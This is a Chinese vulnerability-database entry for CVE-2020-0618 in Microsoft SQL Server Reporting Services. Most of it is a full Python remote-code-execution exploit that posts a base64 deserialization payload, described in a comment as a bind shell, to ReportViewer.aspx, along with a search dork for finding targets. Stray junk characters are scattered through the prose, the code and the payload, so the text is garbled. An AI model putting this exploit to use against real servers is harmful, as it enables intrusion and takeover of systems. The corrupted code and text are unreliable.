Microsoft SQL Server和Microsoft SQL Server Reporting Services 安全漏洞

漏洞ID 1926764 漏洞类型 输入验证错误
发布时间 2020-09-18 更新时间 2020-09-18
CVE编号 CVE-2020-0618

CNNVD-ID CNNVD-202002-496
漏洞平台 N/A CK e J K J , n P dVSS评分 N/A
漏洞来源
https://cxsecurity.com/issue/t ! M iWLB-2i j #020090085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNV= N t * b w &D-202002-496
漏洞详情
Microsoft SQLy N } t u L U 4 Server Reporting Services(SSRS)是美国微软(Microsoft)公司的一套基于服务器的报I o 7 ) 2 g Q u F告平台,它支持创建、部署和管理移动和分页报Y q C f # U表。
Microsoft SQL Sek ] irver Reporting Services中L a & ] H z 4 /存在远程代码执行漏洞,该漏洞源于程序不正确的处理页面j j A N ? ; % J i请求。攻击者可利用该漏洞在系统上执行代码。以下产品及版; A b | 4 6本受到r Z Y影响:Microsoft SQL Server 2012,Microsoft SQL Server 2014 Service Pack 3,Microsoft SQL Server 2016
漏洞EXP
# Exploit Title: Microsoft SQL Server Reporting Service/ C W e H . A s 2016 - Remote Code Execution
# Google Dork: inurl:ReportViewer.aspx
# Date: 2020-09-17
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.co[ n i u : ym
# Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR),
Microst M %oft SQL Server 2014 32-bit/x64x : % , SP3 (CU/Gw * B r F -DR), Microsoft SQL
Server 2012 32-bit/x64 SP2 (QFE)
# Tested on: Windows 2016
# CVE : CVE-2020-0618
# Credit goes to Soroush Dalili
# Source:
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
# httM - Y X R sps://www.mdsec.co.uk/2020/02/cve-202m h M $ M / 20-0618-rce-in-sqlF z { 8 , i ] i 6-server-reporting ! Dg-services-ssrs/
#!/usr/bin/python
from req2 O huests.packages: 0 m ` = z Y.urllib3.exceptions imporn r M Wt InsecureRequest5 Z o { AWarning
fromI j e D T ` requests_ntlm import HttpNtlmAuth
import argparse, requests, logging
from bs4 import BeautifulSoup
fL M C K / `rom sys import argv, exit, stderr, stdout
# to create a payload (default is bindshell on 0.0.0.0:65535):
# .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..."
class Exploit:
payload = '/wEy4hYAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3Ri e ] # 0 ( A tlbSwg, B A e o g ] MVmVyc2lvbj00LjAuMC4^ q  x N BwLc m = { w # 0  oCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQ- r c WBU3lzdGVtLkNvbGxw `  mlY3Rpb25zLkdlbmVya$ g U I _ ^ % WMuU29ydGVkU; H 1  z 0 r2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAE , . WsIEN1bHR1cmU9bmV1dHJhbCwgUL R { K - qHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVC 1 M Y S W `Db3VudAhDb21wYXJlcgdWZXJzaW9uBUlK f ! ] v n h K P0ZW1zAAMABgiNAVN5c3RlbS5Db2x( G 4 Y V csZWN0aW9ucy5HZW5lcmljLkNvbXB| C c 7hcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2Nvcmxg y ` ` 6 L lpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgV 0 - I i o 9CAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4c W )wLCBDdWx0dXJlPW5ldXRyYWwsIFBI V , F c T 01YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWe } & G ~ D YxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBj d } 2 X b p yQAAABEEAAAAAgAAAAYGAAAAqAUv, F UYyBwb3dlcnNoZWx5 w p / 0 g ; I 1sLmV4ZSAtZx  # Q mXhlYyBieXBhc3MgLW5vbmludGVyYWN` b & H =0aXZlIC1ub2V4a ! P d 1 jXQgLXdpbmRvd3NY = a0eWxlIGhpZGRlbiA_ Q * 7 {tYyBpZXgoW3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6ZGVmYXVsdC5nZXRzdHJpbmcoW3N5cO c . !3R[ x K r # flbS5jb252ZXJ0XTo6ZnJvbWJhc2U2NHN0cmluZygnSkdFOVczTjVjM1JsYlM1dVx 6 g )pYUXVjMjlqYTJWMGN5NTBZMv c L $ M E C * C0JzYVhOMFpXNWxjbDAyTlRVek5Uc2tZUzV6ZEdGeWRDZ3BPeVJqUFNSaExtRmpZMlZ3ZEhSamNHTnNhV1Z1ZENncE95UmxQU1JqTD $ r  D `G1kbGRITjBjbVZoYlNncE8xdGllWFJsVzExZEpHYzlNQzR1TmpVMU16VjhKWHN3ZlR` e T y y w c0M2FHbHNaU2dvSkdnOUpHVXVjbVZoWkNna1pz @ J , Y ]5d3dMQ1JuTG14bGJtZDBhQ2twTFc1bElEQXBleVJzUFNodVpYY3RiMkpxWldOMElDMTBlWEJsYm1GdFpTQnplWE4wWlcwdWRHVjRkQzVoYzJ; 3 IOcGFXVnVZMjlrYVc1bktTNW5aWFJ6ZEhKcGJtY29KR2NzTUN3a2FDazdKRzQ5S0dsbGVDQWtiQ0F5UGlZeGZHOTFkQzF6ZEhKcGJtY3BPeVJ3UFNJa0tDUnVLU1FvS0hCM1pDa3VjR0YwYUNrK0lqc2tjVDBvVzNSbGVIUXVaVzVqYjJScGJtZGRPanBoYzJOcGFTa3VaMlYwWW5sMFpYTW9KSEFwT3lSbExuZHlhWFJsS0NSeExEQXNKSEV1YkdWdVozUm9LVHNrWlM1bWJIVnphQ2dwZlRza1l5NWpiRzl6WlNncE95UmhMbk4wYjNBb0tUc05DZz09JykpKQYHAAAAA2NtZAQFAAAb [ ) N ? 2 (AIlN6 1 F + l = g5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMo - K W p ^ E BDAzBTeXN0ZW0uRGVsZWdhdGVTZ; g nXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY33 + J kRb e _ /pb24uTWVtYmVySW5m; ] 4 F S v q 7b1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLl| j + ` SJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXR) k J U ` # C mpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYX/ = *RlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkY V @ T x ?GdGFyZ2 y L # c e k A2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5u K O 1 a u U @EZWxlZ2F0ZVNlcmlhbGl6YXRpb25V x F y a t M E ^Ib2xkZXIrRGVsZWdhdGVR / c ^ t ! 4FbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaZ ? p f [ [ . # -W5nLCBtc2N0 b B [ rvcmxp A g - s | 9pYiwgVmVyc2lvbJ w A 5 . n kj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBg n | o [tc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI! q G n n  L d f3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RC ] apY3MuUHJvY2U 0 R 5 d GVzcywgF ? f AU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHV! 2 QibGljS2V5VG9rZWO ? X49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4Q d b , u - kwLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbv A 5 p *j1iNh q . L v 1 a Y %zdhNWM1NjE5MzRlMDg5CgYNAAAASVNS A e n ] u5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1Ymxe F r [ C M 9pY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGl3 s X !  # IvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ254 @ g g _ i h i [hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJP ~ NpY0FyZ: 0 . o3VtZW50cwEBA@ 1 # @QEBAAMIDVN5c3Rl4 & 5 } &bS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3M6 . O 3uUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5B d } tnLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9/ k X c :zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAA6 o 2 1 ; yAAoBCgAAAAkAAAAI D h w @ |GFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZWb q M # ? N D b %0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcc q  ? n M + GGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJU . D SlPW5a * = . ` H ] !ldXRy~ @ h 7 = UYWwsIX { + k 6 i pFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL'
timeout = 0.5
cooT x - O $ 7 d W 0kies = {}
params = {}
def __init__(self, opt):
requests.packages.urllib3.disable_waZ N _ 7 C Q T  :rnings(InsecureRequestWarB t - e w y g v 4nin9 W 7 c ) @ ~g)
self.us+ # @ername = '%s\\%s' % (opt.domain, opt.use* g { Ername)Y a v ? ` W R b
self.targeti N k t ` Y H = '%s%s' % (opt.targetb s $ 9, opt.path)
self.password = opt.pasJ z ; y ; B T ,sword
self.session = requests.session()
self.redirect = opt.redirect
sel# t  q # % S / 2f.proxies = {
'http': 'http://%s' % opt.proxy,
'https': 'http://%s' % opt.proxy
} if opt.proxy != '' else {}
self.headers = {
'User-AW @ * 9 $gentq ] ! M 7 { Q'; : I } i U ; P F: 'Mozilla/5.0 (Windoi G ? m @ Q hws NT 1v % B  U B ]0.0; Win64; x64)
AppleWebKit/537.36 (_ T b OKHTML, like Gecko)',
'L d $ c } z W .Content-Type': 'application/x-www-form-urlenco3 0 Bded'
}
self.form = {
? / f ! ( K'__VIEWSTATE': '',
'NavigationCory  0 ( Rrector$PageState':I | m 'NeedsCorrection',
'NavigationCorrA z 7 C z Rector$e B l ; 2 X * }ViewState': self.payload
}
if opt.debu- | _ Xg:
self.debug()
def info(self, messa; ! 1  c | gge):
stdout.write('[+] %s\n' % str(message))
return self
d= D ^ % I h  b ?ef errorp D + C D y(self, message):
stderr.write(4 K l t x U #'[-] error: %sF o 5 h\n' % str(c ; . { -message))
return s$ a g ] o |elf
def do) 4 % Get(self, url, params=None6 H U !, values=None):
self.info('sending get request to %s' % url)
try:
return self.session.get(
url=ur[ | k e ^ ? W t *l,
verify=False,
allow_redi- _ d  0 a D D Jrects=sel2 a  S / 1 ^f.redirect,
headers=self.headers,
cookies=self.co+ [ s 1 eokg ? z Jies,
proE f 8 1 D 7 ) _ dxies=self.proxies,
data=values,
params=params,
auth=HttpNtlmM / R ^ K ! d .Auth(self.username, self.password)
) if self.username != h Q 3 z H'\\' else self.session.get(
url=url,
verify=False,
all9 $ L ; 4 y Qow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=sp / m ; ( |elf.pro! } P @xies,
data=valuesa | ^,
params=L q ] + ! % ? k IparE R L G 5 4 N o ~ams
)
except Exceph O h . n y C x =tion as err:
self.error(err)( + |
def doPost(self, url, values=None, params=None):
self.info('sendinM k s p 5 : ^g post request to %s' % url)
try:
return self.sessE - k Mion.post* G N * ~ t A(
url=url,
data=values,
verify=False,
allow_redirects=self.redirectg ( @ 3 h { /,
headers=self.h* / |eaders,
cookies=self.cookies,
proxies=self.proxies,
params=params,
auth=HttpNtlmAuth(self.usernas 8 , d ( j 3 I qme, self.password)
) if self.username != '\\' else self.session.! U _ s j M p Opost(
url=url,
data=values,
verify=False,
allow_redirects=seL . ` K J llf.redir_ I ect,d ^ G
headers=self.headers,
cookies=self.cookies,
proxies=selfM ] B 7.proxies,
params=params
)
except Exception as err:
self.error(err)
def parsePage(self, content):
self.info('parsing form values')
soup = BeautifulSoup(content, ' k /lxml')
for tag in soup.select('input'):
try:
self.form[tag['name']] = t@ a 3 ! F Qag['value']
except Exception as err:
self.error(err)
return self
def debug(self):
self.info('ds - G ebugging e* - knabled')
try:
import http.client as http_client
except ImportError:. E ;
import httplib as http_clJ [ y Q ! ~ient
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig()
lZ A n = z [ogging.getLogger().setLevel(h m g n ( U X 2 zlogging.DE8 r Z V . W %BUG)
requests_log = logging.getLogger("reque) E m @ ;sts.packaB a y g M 1 q y Cges.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
return self
def getForm(self):
self.info('r^ `  & Yetrieving form values')
rs h 6 ! ~esp = self.doGet(url=self.target)
selfg ! %.parsePage(content=resp.cot g D D |ntent)
return self
def exploit9 L F o 3 S ((self):
self.info('exploiting target')
resp = selft Q L A ( K N J.doPost(url=self.target, params=self.params,
values=self.form)
self.info('received response %d' % resp.status_code)
return self
if __name__ == '__main__':
parser = argparse.ArgumB 8 / ( & -entParser(
descriptiof K } ? rn='CVE-2020-0618 SQL Server Reporting Services
ViewState Deserialization exploit',
add_help=True
)L ^ E * j
try:
parser.add_argument('-target', action='store', help='Target
address: http(sX G ? i G Q C)://target.com ')
parser.add_argument(7 u | S - p a'-username', a, 9 ction='store', default='',
help='UsernaU ` 2 & G 9 L s vme to use: first.last')
parsex 8 ! C K g 9 Kr.addT 1 e 7 & q $_argument('-domain', actioX Y v an='sto: } Lre', default='',
help='User domain to use: dom[ 0 : 4 T r zain.local')
parser.add_argument(% + f 4 W 0 [ *'-password', action='store', default='',
help='Pas_ V 2 8 [ [sword1 L C * [ 2 to use: Summer2020')
parser.add_argument('-debug', action='store', default=False,
help='Enable debugging: Fa` J a 7 ! L ?lse')
parser.add_argument('-redirect', action='store',
default=False, help='Follow redirects: Fals8 [ !e')
parser.add_are K t mgument('-proxy', action='store', default='',
help='Enable proxy: 10.10.10.10:8080')
parser.add_argument('-path', action='store',
default='/ReportServer/pages/ReportViewer.aspx', help='Path to page')
if len(argv) == 1:
parser.print_help()
exit(1)
options = parser.parse_args()
Exploit(opt=optij u . } K Ions).exploit()
except Exception as error:
stderr.write('[-] errorK / I + y T p in main %s\i q T ! & M Sn' % s= r l 2 6 y Htr(error))
Regards,
WestS ~ ( e p Shepherd
OSWE  OSa 2 f e N r d pCE  OSCP  OSWP  CEH  Security+
West Lee Shepherd, LLC
参考资料

来源:portal.msrc.microsoftP 1 # G G 8 C %.com

链接:https://portal.msrc.microsoft.com/en-US/security-guidanF J cce/adf } n U 3 c f % avisory/CVE-2020-0618

来源:portal.msrc.microsoft.com

链接:https://portal.msrc.microsoft.com/@ j x a 2zh-CN/security-guidance/adviso6 A 8 M = &ry/CVE-2020-0618

来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2020-0618